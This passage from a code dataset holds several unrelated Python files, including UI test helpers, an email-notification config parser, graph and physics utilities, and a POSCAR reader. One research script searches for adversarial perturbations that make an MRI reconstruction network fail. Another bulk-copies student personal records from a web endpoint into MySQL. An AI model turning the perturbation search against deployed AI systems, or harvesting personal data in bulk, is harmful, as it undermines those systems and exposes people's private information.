environment_dict,\n run_config,\n )[solid_name]\n\n\n@contextmanager\ndef yield_empty_pipeline_context(run_id=None):\n with scoped_pipeline_context(PipelineDefinition([]), {}, RunConfig(run_id=run_id)) as context:\n yield context\n","sub_path":"python_modules/dagster/dagster/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"176066941","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n#name = setting_beginning_currency.py\n#author = tangtao\n#time = 2016/9/14 14:06\n#Description=设置-期初-外币期初\n#eMail =tangtao@lhtangtao.com\n# code is far away from bugs with the god animal protecting\nI love animals. They taste delicious.\n┏┓ ┏┓\n┏┛┻━━━┛┻┓\n┃ ☃ ┃\n┃ ┳┛ ┗┳ ┃\n┃ ┻ ┃\n┗━┓ ┏━┛\n┃ ┗━━━┓\n┃ 神兽保佑 ┣┓\n┃ 永无BUG! ┏┛\n┗┓┓┏━┳┓┏┛\n┃┫┫ ┃┫┫\n┗┻┛ ┗┻┛\n\"\"\"\nimport sys\n\nfrom YqdzUILibrary.financial.setting.setting_beginning.all_kinds_beginning import AllBeginningPage, \\\n get_financial_all_beginning_title_column, \\\n get_financial_all_beginning_row_num, financial_all_beginning_traverse_column, \\\n input_financial_all_beginning_balances, \\\n get_financial_all_beginning_value\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\ndef get_financial_beginning_currency_column_number(driver, is_jan, kind=u\"外币往来\"):\n \"\"\"\n 查看财务中心-设置-期初与科目-外币期初中整个期初header一共有多少列 返回列数\n :param is_jan: 是否为一月记账\n :param driver:\n :return:\n \"\"\"\n if is_jan != \"yes\":\n return AllBeginningPage(driver).get_title_column_num(kind)\n else:\n return str(int(AllBeginningPage(driver).get_title_column_num(kind)) - 2)\n\n\ndef get_financial_beginning_currency_title_column(driver, title, total_column, kind=u\"外币往来\"):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初 输入标题返回标题在第几列\n :param driver:\n :param title:\n :param total_column:\n :return:\n \"\"\"\n return get_financial_all_beginning_title_column(driver, title, total_column, kind)\n\n\ndef get_financial_beginning_currency_row_num(driver):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初中,查看总共有多少行\n :param driver:\n :param kind:\n :return:\n \"\"\"\n return get_financial_all_beginning_row_num(driver, u\"外币期初\")\n\n\ndef traverse_financial_beginning_currency_title_row(driver, info, column, total_row):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初中 在第column列中查找遍历info所在第几行\n :param driver:\n :param info:\n :param kind:\n :param column:\n :param total_row:\n :return:\n \"\"\"\n kind = u\"外币期初\"\n return financial_all_beginning_traverse_column(driver, info, kind, column, total_row)\n\n\ndef traverse_financial_beginning_currency_title_column(driver, title, total_column, kind=u'外币往来'):\n \"\"\"\n 遍历在财务中心-设置-期初与科目-外币期初 输入标题返回标题在第几列\n :param driver:\n :param title:\n :param total_column:\n :return:\n \"\"\"\n return get_financial_all_beginning_title_column(driver, title, total_column, kind)\n\n\ndef input_financial_beginning_currency_balances(driver, row, column, plus_one=\"no\", amount=\"\",jan=\"no\",kind=u\"外币往来期初\"):\n \"\"\"\n 在财务中心-设置-期初与科目设置-期初-外币期初中输入金额\n :param kind:\n :param jan:\n :param driver:\n :param row:\n :param column:\n :param plus_one:如果是yes则column默认+1 yes表示输入本币金额,no则表示输入外币金额\n :param amount:\n :return:\n \"\"\"\n column_int = int(column)\n if jan==\"no\":\n if kind == u\"外币往来期初\":\n if column_int == 5:\n column = 6\n if column_int == 6:\n column = 8\n if column_int == 7:\n column = 9\n elif kind == u\"期初外币余额\":\n if column_int == 6:\n column = 7\n if column_int == 7:\n column = 9\n else:\n column=column_int\n # print row,column\n input_financial_all_beginning_balances(driver, u\"外币期初\", row, column, plus_one, amount,kind)\n\n\ndef get_financial_beginning_currency_value(driver, row, column, plus_one,jan=\"no\",kind=u\"外币往来期初\"):\n \"\"\"\n 输出财务中心-设置-期初与科目设置-期初-数量期初中指定行列的数据\n :param jan: 建账期是否为1月\n :param plus_one: 如果输入yes则column会加一\n :param driver:\n :param row:\n :param column:\n :return:\n \"\"\"\n column_int = int(column)\n if jan==\"no\":\n if kind==u\"外币往来期初\":\n if column_int == 5:\n column =6\n if column_int == 6:\n column = 8\n if column_int == 7:\n column = 9\n elif kind==u\"期初外币余额\":\n if column_int == 6:\n column = 7\n if column_int == 7:\n column = 9\n else:\n column=column_int\n if plus_one == \"yes\":\n return get_financial_all_beginning_value(driver, u\"外币期初\", row, int(column) + 1)\n else:\n return get_financial_all_beginning_value(driver, u\"外币期初\", row, column)\n","sub_path":"YqdzUILibrary/financial/setting/setting_beginning/setting_beginning_currency.py","file_name":"setting_beginning_currency.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"96038159","text":"\"\"\"\nThis script searches for a perturbation, which makes the network fail.\nThe result will be saved in a Runner object. Make sure you have updated the \nautomap_config.py file before running this script.\n\"\"\"\n\nimport tensorflow as tf;\nimport scipy.io;\nimport h5py\nfrom os.path import join;\nimport os;\nimport os.path;\nimport _2fc_2cnv_1dcv_L1sparse_64x64_tanhrelu_upg as arch\nimport matplotlib.image as mpimg;\nimport numpy as np;\nfrom automap_config import src_weights, src_mri_data;\nfrom automap_tools import *;\nfrom Runner import Runner;\nfrom Automap_Runner import Automap_Runner;\n\nk_mask_idx1, k_mask_idx2 = read_automap_k_space_mask();\n\ndata = scipy.io.loadmat(join(src_mri_data, 'HCP_mgh_1033_T2_128_w_symbol.mat'));\nmri_data = data['mr_images_w_symbol'];\n\nbatch_size = mri_data.shape[0];\n\n# Plot parameters\nN = 128; # out image shape\nbd = 5; # Boundary between images\nplot_dest = './plots_con';\nsplits = 'splits';\n\nif not (os.path.isdir(plot_dest)):\n os.mkdir(plot_dest);\n split_dest = join(plot_dest, splits);\n if not (os.path.isdir(split_dest)):\n os.mkdir(split_dest);\n\n# Optimization parameters\nmax_itr = 8; # Update list below. This value is not relevant here\nmax_r_norm = float('Inf');\nmax_diff_norm = float('Inf');\nla = 0.1;\nwarm_start = 'off';\nwarm_start_factor = 0.0;\nperp_start = 'rand';\nperp_start_factor = 1e-5;\nreference = 'pred';\nmomentum = 0.9;\nlearning_rate = 0.001;\nverbose=True; \n\nsess = tf.Session();\n\nraw_f, raw_df = compile_network(sess, batch_size);\n\nf = lambda x: hand_f( raw_f, x, k_mask_idx1, k_mask_idx2);\ndQ = lambda x, r, label, la: hand_dQ(raw_df, x, r, label, la, \n k_mask_idx1, k_mask_idx2); \n\nrunner = Automap_Runner(max_itr, max_r_norm, max_diff_norm, \n la=la, \n warm_start=warm_start,\n warm_start_factor=warm_start_factor,\n perp_start=perp_start,\n perp_start_factor=perp_start_factor,\n reference=reference,\n momentum=momentum,\n learning_rate= learning_rate,\n verbose=verbose,\n mask= [k_mask_idx1, k_mask_idx2]\n );\n\n# Update the number of iteration you would like to run\nmax_itr_schedule = [160, 10, 7, 6];\n\nfor i in range(len(max_itr_schedule)):\n max_itr = max_itr_schedule[i];\n runner.max_itr = max_itr;\n runner.find_adversarial_perturbation(f, dQ, mri_data);\n\nrunner_id = runner.save_runner(f);\n\nprint('Saving runner as nbr: %d' % runner_id);\nrunner1 = load_runner(runner_id);\n\nmri_data = runner1.x0[0];\nim_nbr = 5;\nbd = 5;\nN = 128;\nfor i in range(len(runner1.r)):\n rr = runner1.r[i];\n if i == 0:\n rr = np.zeros(rr.shape, dtype=rr.dtype);\n fxr = f(mri_data + rr);\n x = mri_data[im_nbr, :,:];\n r = rr[im_nbr, :,:];\n fxr = fxr[im_nbr, :,:];\n im_left = scale_to_01(abs(x+r));\n im_right = scale_to_01(fxr);\n im_out = np.ones([N, 2*N + bd]);\n im_out[:,:N] = im_left;\n im_out[:,N+bd:] = im_right;\n fname_out = join(plot_dest, \\\n 'rec_automap_runner_%d_r_idx_%d.png' % (runner_id, i));\n plt.imsave(fname_out, im_out, cmap='gray');\n fname_out_noisy = join(plot_dest, splits, \\\n 'runner_%d_r_idx_%d_noisy.png' % (runner_id, i));\n fname_out_noisy_rec = join(plot_dest, splits, \\\n 'runner_%d_r_idx_%d_noisy_rec.png' % (runner_id, i));\n plt.imsave(fname_out_noisy, im_left, cmap='gray');\n plt.imsave(fname_out_noisy_rec, im_right, cmap='gray');\n\nsess.close();\n","sub_path":"AUTOMAP/Demo_adversarial_noise_multi2.py","file_name":"Demo_adversarial_noise_multi2.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"174682484","text":"\"\"\"\nThis is the YAML configuration parser for Mailrise.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport io\nimport os\nimport typing as typ\nfrom enum import Enum\nfrom logging import Logger\nfrom string import Template\nfrom typing import NamedTuple\n\nimport apprise # type: ignore\nimport yaml\nfrom apprise.common import NotifyType # type: ignore\n\nfrom mailrise.util import parseaddrparts\n\n\nDEFAULT_ASSET = apprise.AppriseAsset(\n app_id='Mailrise',\n app_desc='Mailrise SMTP Notification Relay',\n app_url='https://mailrise.xyz',\n html_notify_map={\n NotifyType.INFO: '#2e6e99',\n NotifyType.SUCCESS: '#2e992e',\n NotifyType.WARNING: '#99972e',\n NotifyType.FAILURE: '#993a2e'\n },\n theme=None,\n default_extension='.png',\n image_url_mask='https://raw.githubusercontent.com/YoRyan/mailrise/main/'\n 'src/mailrise/asset/mailrise-{TYPE}-{XY}{EXTENSION}',\n image_url_logo='https://raw.githubusercontent.com/YoRyan/mailrise/main/'\n 'src/mailrise/asset/mailrise-logo.png',\n image_path_mask=os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 'asset',\n 'mailrise-{TYPE}-{XY}{EXTENSION}'\n )\n )\n)\n\n\nclass ConfigFileError(Exception):\n \"\"\"Exception raised for invalid configuration files.\n\n Attributes:\n message: The reason the configuration file is invalid.\n \"\"\"\n message: str\n\n def __init__(self, message: str) -> None:\n self.message = message\n\n\nclass TLSMode(Enum):\n \"\"\"Specifies a TLS encryption operating mode.\"\"\"\n OFF = 'no TLS'\n ONCONNECT = 'TLS on connect'\n STARTTLS = 'STARTTLS, optional'\n STARTTLSREQUIRE = 'STARTTLS, required'\n\n\nclass Key(NamedTuple):\n \"\"\"A unique identifier for a sender target.\n\n Attributes:\n user: The user portion of the recipient address.\n domain: The domain portion of the recipient address, which defaults\n to \"mailrise.xyz\".\n \"\"\"\n user: str\n domain: str = 'mailrise.xyz'\n\n def __str__(self) -> str:\n return f'{self.user}@{self.domain}'\n\n def as_configured(self) -> str:\n \"\"\"Drop the domain part of this identifier if it is 'mailrise.xyz'.\"\"\"\n return self.user if self.domain == 'mailrise.xyz' else str(self)\n\n\nclass Sender(NamedTuple):\n \"\"\"A configured target for Apprise notifications.\n\n Attributes:\n apprise: The Apprise instance.\n title_template: The template string for notification title texts.\n body_template: The template string for notification body texts.\n body_format: The content type for notifications. If None, this will be\n auto-detected from the body parts of emails.\n \"\"\"\n apprise: apprise.Apprise\n title_template: Template\n body_template: Template\n body_format: typ.Optional[apprise.NotifyFormat]\n\n\nclass MailriseConfig(NamedTuple):\n \"\"\"Configuration data for a Mailrise instance.\n\n Attributes:\n logger: The logger, which is used to record interesting events.\n listen_host: The network address to listen on.\n listen_port: The network port to listen on.\n tls_mode: The TLS encryption mode.\n tls_certfile: The path to the TLS certificate chain file.\n tls_keyfile: The path to the TLS key file.\n smtp_hostname: The advertised SMTP server hostname.\n senders: A dictionary of notification targets. The key is the identifier\n of the configuration, and the value is the Sender instance itself.\n \"\"\"\n logger: Logger\n listen_host: str\n listen_port: int\n tls_mode: TLSMode\n tls_certfile: typ.Optional[str]\n tls_keyfile: typ.Optional[str]\n smtp_hostname: typ.Optional[str]\n senders: dict[Key, Sender]\n\n\ndef load_config(logger: Logger, f: io.TextIOWrapper) -> MailriseConfig:\n \"\"\"Loads configuration data from a YAML file.\n\n Args:\n logger: The logger, which will be passed to the `MailriseConfig` instance.\n f: The file handle to load YAML from.\n\n Returns:\n The `MailriseConfig` instance.\n\n Raises:\n ConfigFileError: The configuration file is invalid.\n \"\"\"\n yml = yaml.safe_load(f)\n if not isinstance(yml, dict):\n raise ConfigFileError(\"root node not a mapping\")\n\n yml_listen = yml.get('listen', {})\n\n yml_tls = yml.get('tls', {})\n try:\n tls_mode = TLSMode[yml_tls.get('mode', 'off').upper()]\n except KeyError:\n raise ConfigFileError('invalid TLS operating mode')\n tls_certfile = yml_tls.get('certfile', None)\n tls_keyfile = yml_tls.get('keyfile', None)\n if tls_mode != TLSMode.OFF and not (tls_certfile and tls_keyfile):\n raise ConfigFileError(\n 'TLS enabled, but certificate and key files not specified')\n\n yml_smtp = yml.get('smtp', {})\n\n yml_configs = yml.get('configs', [])\n if not isinstance(yml_configs, dict):\n raise ConfigFileError(\"'configs' node not a mapping\")\n senders = {_parsekey(key): _load_sender(config)\n for key, config in yml_configs.items()}\n\n logger.info('Loaded configuration with %d recipient(s)', len(senders))\n return MailriseConfig(\n logger=logger,\n listen_host=yml_listen.get('host', ''),\n listen_port=yml_listen.get('port', 8025),\n tls_mode=tls_mode,\n tls_certfile=tls_certfile,\n tls_keyfile=tls_keyfile,\n smtp_hostname=yml_smtp.get('hostname', None),\n senders=senders\n )\n\n\ndef _parsekey(s: str) -> Key:\n def err():\n return ConfigFileError(f\"invalid config key '{s}'; should be a string or \"\n \"an email address without periods in the username\")\n if '@' in s:\n user, domain = parseaddrparts(s)\n if not user or not domain or '.' in user:\n raise err()\n return Key(user=user, domain=domain.lower())\n elif '.' in s:\n raise err()\n else:\n return Key(user=s)\n\n\ndef _load_sender(config: dict[str, typ.Any]) -> Sender:\n if not isinstance(config, dict):\n raise ConfigFileError(\"apprise config node not a mapping\")\n\n # Extract Mailrise-specific values.\n mr_config = config.get('mailrise', {})\n config.pop('mailrise', None)\n title_template = mr_config.get('title_template', '$subject ($from)')\n body_template = mr_config.get('body_template', '$body')\n body_format = mr_config.get('body_format', None)\n if not any(body_format == c for c in (None,\n apprise.NotifyFormat.TEXT,\n apprise.NotifyFormat.HTML,\n apprise.NotifyFormat.MARKDOWN)):\n raise ConfigFileError(f\"invalid apprise notification format: {body_format}\")\n\n aconfig = apprise.AppriseConfig(asset=DEFAULT_ASSET)\n aconfig.add_config(yaml.safe_dump(config), format='yaml')\n apobj = apprise.Apprise(aconfig)\n\n return Sender(\n apprise=apobj,\n title_template=Template(title_template),\n body_template=Template(body_template),\n body_format=body_format\n )\n","sub_path":"src/mailrise/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"213648514","text":"\nfrom Graph import Graph, isomorfo\n\n\ncruzamentos = 4 # número de cruzamentos colocados\ngrafo = Graph(\"asd\")\ncl = [ grafo.add_node(\"c\"+str(i+1)) for i in range(cruzamentos)]\n\ngrafo.add_edge(cl[0],cl[1],10)\ngrafo.add_edge(cl[0],cl[2],10)\ngrafo.add_edge(cl[1],cl[2],15)\ngrafo.add_edge(cl[1],cl[3],20)\n\nsubg = grafo.sub_grafos()\nciclos = grafo.ciclos()\n\nprint(\"conexo:\",grafo.conexo(subg))\nprint(\"subgrafo:\",subg)\nprint(\"ciclos:\",ciclos)\nprint(\"arvore:\",grafo.arvore(ciclos,subg))\nkr = grafo.kruskal()\nprint(\"arvore geradora minima: \",kr.get_edges())\nsubg2=kr.sub_grafos()\nciclos2=kr.ciclos()\nprint(\"é arvore?:\",kr.arvore(ciclos2,subg2))\n","sub_path":"exercicio_arvores.py","file_name":"exercicio_arvores.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"432305632","text":"# The next 4 lines are required word-for-word in the new Django\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Pizzeria.settings\")\n\nimport django\ndjango.setup()\n\nfrom pizzas.models import Pizza, Review\n\npizzas = Pizza.objects.all()\n\nfor pizza in pizzas:\n print(pizza.id, pizza)\n\n# If we know the ID of an object we can use the get() method to\n# examine any attributes the object has.\n\nt = Pizza.objects.get(id=1) # Pizza has ID of 1 (seen by executing the above for-loop)\nprint(t.name)\nprint(t.date_added)\n\n# We can also look at the entries related to a certain topic.\n# Since we defined topic as a foreignkey attribute in the Entry model,\n# Django can use this relationship to access the entries for any topic.\n# To get data through a foreign key relationship, you use the lowercase name\n# of the related model followed by an underscore and the word set.\n\ntoppings = t.topping_set.all() # t represents Chess cause we set it as id 1\n\nfor topping in toppings:\n print(topping)\n\nr = Review.objects.get(id=2) # Pizza has ID of 1 (seen by executing the above for-loop)\nprint(r.review)\nprint(r.date_added)","sub_path":"MyShell.py","file_name":"MyShell.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"170404478","text":"import requests\nimport time\n\ntimeout = 0.2\nfor _ in range(5):\n try:\n response = requests.get(\"https://github.com/not_found\",\n timeout=timeout)\n\n response.raise_for_status()\n break\n except requests.Timeout:\n print(\"попробуйте позже timeout:\", timeout)\n timeout *= 2\n time.sleep(timeout)\n except requests.HTTPError as err:\n print(err.response.status_code)\n raise\n # except requests.RequestException as e:\n # print(e.strerror)\n\n","sub_path":"week_3/working_with_errors/03_exceptions_in_requests.py","file_name":"03_exceptions_in_requests.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"339088357","text":"'''\r\n安���requests模块\r\nrequests模块是模拟浏览器发送一些网络请求的的工具\r\n清楚一个网址的请求模式。get,post\r\n get 请求比较不安全,\r\n post请求专门放到一个安全的区域,然后在传输过去\r\n\r\n'''\r\n# import requests\r\n#\r\n# response=requests.post(url=\"http://www.jasonisoft.cn:8080/HKR/UserServlet?method=findAllStudent\")\r\n#\r\n# response.encoding=\"utf-8\"\r\n# users = response.json()\r\n# eval(users)\r\n# for i in users:\r\n# print(i)\r\nimport requests\r\nimport pymysql\r\n\r\nresponse = requests.post(url=\"http://www.jasonisoft.cn:8080/HKR/UserServlet?method=findAllStudent\",\r\n data={\"username\":\"jason\"})\r\nresponse.encoding = \"utf-8\"\r\nlist1=[]\r\nusers = response.json() #[{age:56},{}]\r\ncon=pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"requ\")\r\ncursoe=con.cursor()\r\nsql14=\"insert into student (address,age,carte,classname,email,graduation,id,loginname,\" \\\r\n \"phoneNumber,picturePath,registerDate,sex,uid,username) \" \\\r\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\nsql13=\"insert into student (address,age,classname,email,graduation,id,loginname,\" \\\r\n \"phoneNumber,picturePath,registerDate,sex,uid,username) \" \\\r\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\r\nlist2=[]\r\nnewlist14=[]\r\nnewlist13=[]\r\nfor user in users:\r\n if len(user.keys())==14:\r\n list14=list(dict(user).values())\r\n newlist14.append(list14)\r\n if len(user.keys())==13:\r\n list13=list(dict(user).values())\r\n newlist13.append(list13)\r\ncursoe.executemany(sql14,newlist14)\r\ncursoe.executemany(sql13,newlist13)\r\ncon.commit()\r\ncursoe.close()\r\ncon.close()\r\n","sub_path":"requ.py","file_name":"requ.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"621106836","text":"# Version 1.9\n\nimport math, copy\nimport numpy as np\nfrom scipy import sparse\nfrom scipy.sparse.linalg import minres\n\n\n\n\n\ndef site_prob(beta, site_ene, pre):\n Pa = np.zeros(len(site_ene))\n Pa = np.exp(-beta*site_ene) / pre\n part_func = np.sum(Pa)\n\n Pa /= part_func\n Pa_sqrt = np.sqrt(Pa)\n return Pa, Pa_sqrt\n\n\n\ndef rates(beta, o_o_ind_list, o_o_elist, site_ene, pre, preT, Pa, Pa_sqrt):\n wab = np.zeros((len(site_ene),len(site_ene)))\n Wab = np.zeros((len(site_ene),len(site_ene)))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n wab[j][k] = pre[j] * np.exp(-beta*(o_o_elist[j][k]-site_ene[j])) / preT[j][k]\n Wab[j][k] = (Pa_sqrt[j]) * wab[j][k] * (1/Pa_sqrt[k])\n \n wab[j][j] = -np.sum(wab[j])\n Wab[j][j] = wab[j][j]\n return wab, Wab\n\n\n\ndef get_bvec(o_o_ind_list, Pa_sqrt, wab, transport_vec):\n bvec = np.zeros((len(o_o_ind_list),3))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n bvec[j] += Pa_sqrt[j] * wab[j][k] * transport_vec[j][k] \n return bvec\n\n\n\ndef get_eta(o_o_ind_list, Wab, bvec):\n eta = np.zeros((3,len(o_o_ind_list)))\n \n Ilist, Jlist, Vlist = [], [], []\n for j, x in enumerate(o_o_ind_list):\n for k in x:\n Ilist.append(j)\n Jlist.append(k)\n Vlist.append(Wab[j][k])\n Ilist.append(j)\n Jlist.append(j)\n Vlist.append(Wab[j][j])\n \n W = sparse.csr_matrix((Vlist,(Ilist,Jlist)), shape=(len(o_o_ind_list),len(o_o_ind_list)))\n for j in range(3):\n eta[j], info = minres(W, bvec[:,j], x0=np.random.rand(W.shape[0]), tol=1e-8)\n return eta\n\n\n\ndef get_bias(bvec, eta):\n bias = np.zeros((3,3))\n \n for row in range(3):\n for col in range(3):\n for b,e in zip(bvec[:,row],eta[col]):\n bias[row][col] += b*e\n return bias\n\n\n\ndef get_bare(o_o_ind_list, Pa, wab, transport_vec):\n Do= np.zeros((3,3))\n \n for j in range(len(o_o_ind_list)):\n for k in o_o_ind_list[j]:\n Do += 0.5 * Pa[j] * wab[j][k] * np.outer(transport_vec[j][k],transport_vec[j][k]) \n return Do\n\n\n\ndef diffuser(Tlist, beta_list, site_ene, o_o_ind_list, o_o_elist, pre, preT, transport_vec):\n D_T_list = []\n \n for i,T in enumerate(Tlist):\n Pa, Pa_sqrt = site_prob(beta_list[i], site_ene, pre)\n wab, Wab = rates(beta_list[i], o_o_ind_list, o_o_elist, site_ene, pre, preT, Pa, Pa_sqrt)\n bvec = get_bvec(o_o_ind_list, Pa_sqrt, wab, transport_vec)\n eta = get_eta(o_o_ind_list, Wab, bvec)\n bias = get_bias(bvec, eta)\n Do = get_bare(o_o_ind_list, Pa, wab, transport_vec)\n\n D = np.zeros((3,3))\n D = (Do + bias)*1e-8\n D_T_list.append(np.diag(D))\n return D_T_list\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\ndef posreader(PosName='POSCAR'):\n# \"\"\"\n# Read the atomic configuration from POSCAR\n#\n# Args:\n# PosName (str): the name of the POSCAR File, (default: 'POSCAR')\n# \"\"\"\n POS = {} #B #Initialize the dictionary for POSCAR information\n Fid = open(PosName,'r')\n \n Line = Fid.readline() \n POS['CellName'] = Line.split('\\n')[0] #B #Comment line #Comment line\n\n Line = Fid.readline()\n Sline = Line.split()\n POS['LattConst'] = float(Sline[0]) #B #Lattice constant #Universal scaling factor (lattice constant)\n \n POS['Base'] = [[0.0]*3 for i in range(3)] #B #Initilize the base list\n for i in range(3): #Three lattice vectors\n Line = Fid.readline()\n Sline = Line.split()\n #@POS['Base'][i] = [float(Sline[i]) for i in range(3)];\n POS['Base'][i] = [float(Sline[i])*POS['LattConst'] for i in range(3)] #!\n\n\n Line = Fid.readline()\n Sline = Line.split()\n POS['EleName'] = Sline #B #The name of each element #Name of atomic species\n POS['EleNum']= len(POS['EleName']) #B #number of elements involved #EleNum = 3 (Sr, Ti, O)\n \n Line = Fid.readline()\n Sline = Line.split()\n POS['AtomNum'] = [0]*POS['EleNum']\n POS['AtomSum'] = 0\n for ind, Num in enumerate(Sline):\n POS['AtomNum'][ind] = int(Num) #AtomNum = [32, 32, 96], number of atoms per atomic species\n POS['AtomSum'] += int(Num) #AtomSum = 160, total number of atoms\n\n\n Line = Fid.readline()\n Sline = Line.split()\n FL = Sline[0][0] #B #Check the first letter\n if (FL=='S'): #Selective dynamics\n POS['IsSel'] = 1\n POS['SelMat'] = [['X']*3 for i in range(POS['AtomSum'])]\n Line = Fid.readline()\n Sline = Line.split()\n FL = Sline[0][0] #B #Check the first letter for coord\n else:\n POS['IsSel'] = 0\n\n \n #B # Set up the lattice type \n if (FL=='D') | (FL=='d'): #Direct coordinates\n POS['LatType'] = 'Direct'\n elif (FL=='C') | (FL=='c'): #Cartesian coordinates\n POS['LatType'] = 'Cartesian'\n else:\n print(\"Please check the POSCAR file, the lattice type is not direct or cartesian\")\n \n POS['LattPnt'] = [[0.0]*3 for i in range(POS['AtomSum'])] #B #Initialize lattice points\n\n if (POS['LatType']=='Direct'): #!\n for i in range(POS['AtomSum']): #!\n Line = Fid.readline() #!\n Sline = Line.split() #!\n POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #!\n if(POS['IsSel']): #!\n POS['SelMat'][i] = [Sline[i+3] for i in range(3)] #!\n \n elif (POS['LatType']=='Cartesian'): #!\n BaseInv = np.linalg.inv(POS['Base']) #!\n for i in range(POS['AtomSum']): #!\n Line = Fid.readline() #!\n Sline = Line.split() #!\n POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #!\n POS['LattPnt'][i] = list(np.dot(BaseInv, POS['LattPnt'][i])) #!\n if(POS['IsSel']): #!\n POS['SelMat'][i] = [Sline[i+3] for i in range(3)] #!\n\n else: #!\n print(\"Please check the POSCAR file, the lattice type is not direct or cartesian\") #!\n \n#@ for i in range(POS['AtomSum']):\n#@ Line = Fid.readline()\n#@ Sline = Line.split()\n#@ POS['LattPnt'][i] = [float(Sline[i]) for i in range(3)] #LattPnt = [0.25, 0.0, 0.125], Direct coordinates\n#@ if(POS['IsSel']):\n#@ POS['SelMat'][i] = [Sline[i+3] for i in range(3)]\n\n Fid.close()\n #B #The current version does not support reading the POSCAR with velocity information!!!!!!!!!!!!!!!!\n return POS\n##########\n\n\n\n\n\n##########\ndef poswriter(PosName,POS):\n# \"\"\"\n# Write out the POS into a POSCAR file\n#\n# Args:\n# PosName: the name of the POSCAR file\n# POS: the POS dictionary\n# \"\"\"\n Fid = open(PosName,'w')\n Fid.write('%s ' %POS['CellName'])\n Fid.write('\\n')\n \n Fid.write('%f \\n' %POS['LattConst']) \n for i in range(3):\n Fid.write('%f %f %f \\n' %(POS['Base'][i][0], POS['Base'][i][1], POS['Base'][i][2]))\n\n for i in range(POS['EleNum']):\n Fid.write('%s ' %POS['EleName'][i])\n Fid.write('\\n')\n\n for i in range(POS['EleNum']):\n Fid.write('%i ' %POS['AtomNum'][i])\n Fid.write('\\n')\n \n if (POS['IsSel']):\n Fid.write('Selective Dynamics \\n')\n\n Fid.write('%s \\n' %POS['LatType'])\n for i in range(POS['AtomSum']):\n Fid.write('%f %f %f ' %(POS['LattPnt'][i][0], POS['LattPnt'][i][1], POS['LattPnt'][i][2]))\n if (POS['IsSel']):\n Fid.write('%s %s %s ' %(POS['SelMat'][i][0], POS['SelMat'][i][1], POS['SelMat'][i][2]))\n Fid.write('\\n')\n \n Fid.close()\n##########\n\n\n\n\n\n##########\ndef dismatcreate(POS):\n# \"\"\"\n# Create the distance matrix for a given POS\n#\n# Args:\n# POS: the POS dictionary\n# \"\"\"\n POS['dismat'] = [[0.0]*POS['AtomSum'] for i in range(POS['AtomSum'])]\n \n for AtomInd1, Pnt1 in enumerate(POS['LattPnt']):\n for AtomInd2, Pnt2 in enumerate(POS['LattPnt']):\n Pnt1=np.array(Pnt1)\n Pnt2=np.array(Pnt2)\n PntDis = Pnt1 - Pnt2\n \n for i in range(3):\n if (PntDis[i]>0.5):\n PntDis[i] = 1 - PntDis[i]\n elif (PntDis[i]<-0.5):\n PntDis[i] = PntDis[i] + 1\n elif (PntDis[i]>=-0.5) & (PntDis[i]<=0.5):\n PntDis[i] = abs(PntDis[i])\n else:\n print(\"Something is wrong when calculating dist matrix\")\n \n PntDis = np.dot(PntDis, POS['Base'])\n POS['dismat'][AtomInd1][AtomInd2] = math.sqrt(PntDis[0]**2 + PntDis[1]**2 + PntDis[2]**2)\n \n return POS\n##########\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\ndef findGrpLst(Lst):\n# \"\"\"\n# Group the lst\n# \"\"\"\n\n #Lst=[1,1] -> GrpLst=[[0,1]]\n #Lst=[1,2] -> GrpLst=[[0],[1]]\n #Lst=[1,1,2] -> GrpLst=[[0,1],[2]]\n #Lst=[1,2,2] -> GrpLst=[[0],[1,2]]\n #Lst=[1,2,1] -> GrpLst=[[0],[1],[2]]\n \n GrpLst = [[0]]\n Loc = 0\n NLst = len(Lst)\n for Ind in range(1,NLst):\n #B #print Lst[Ind], Lst[Ind - 1];\n if Lst[Ind] == Lst[Ind - 1]: #Lst의 숫자가 그 전 숫자와 같으면\n GrpLst[Loc].append(Ind) #같은 []에 숫자를 추가. [0,1,..]\n else: \n Loc += 1 \n GrpLst.append([]) #다르면\n GrpLst[Loc].append(Ind) #다음 []에 숫자를 추가. [0],[1],..\n return GrpLst\n##########\n \n\n\n\n\n##########\ndef grporderPermute(Lst, GrpLst):\n# '''\n# Find the permution of group list\n#\n# Args:\n# Lst: The original list, somthing like [1,100,1000]\n# GrpLst: the list of group of Lst, something like [[0,1],2]\n# '''\n \n #Lst=[1,1] -> 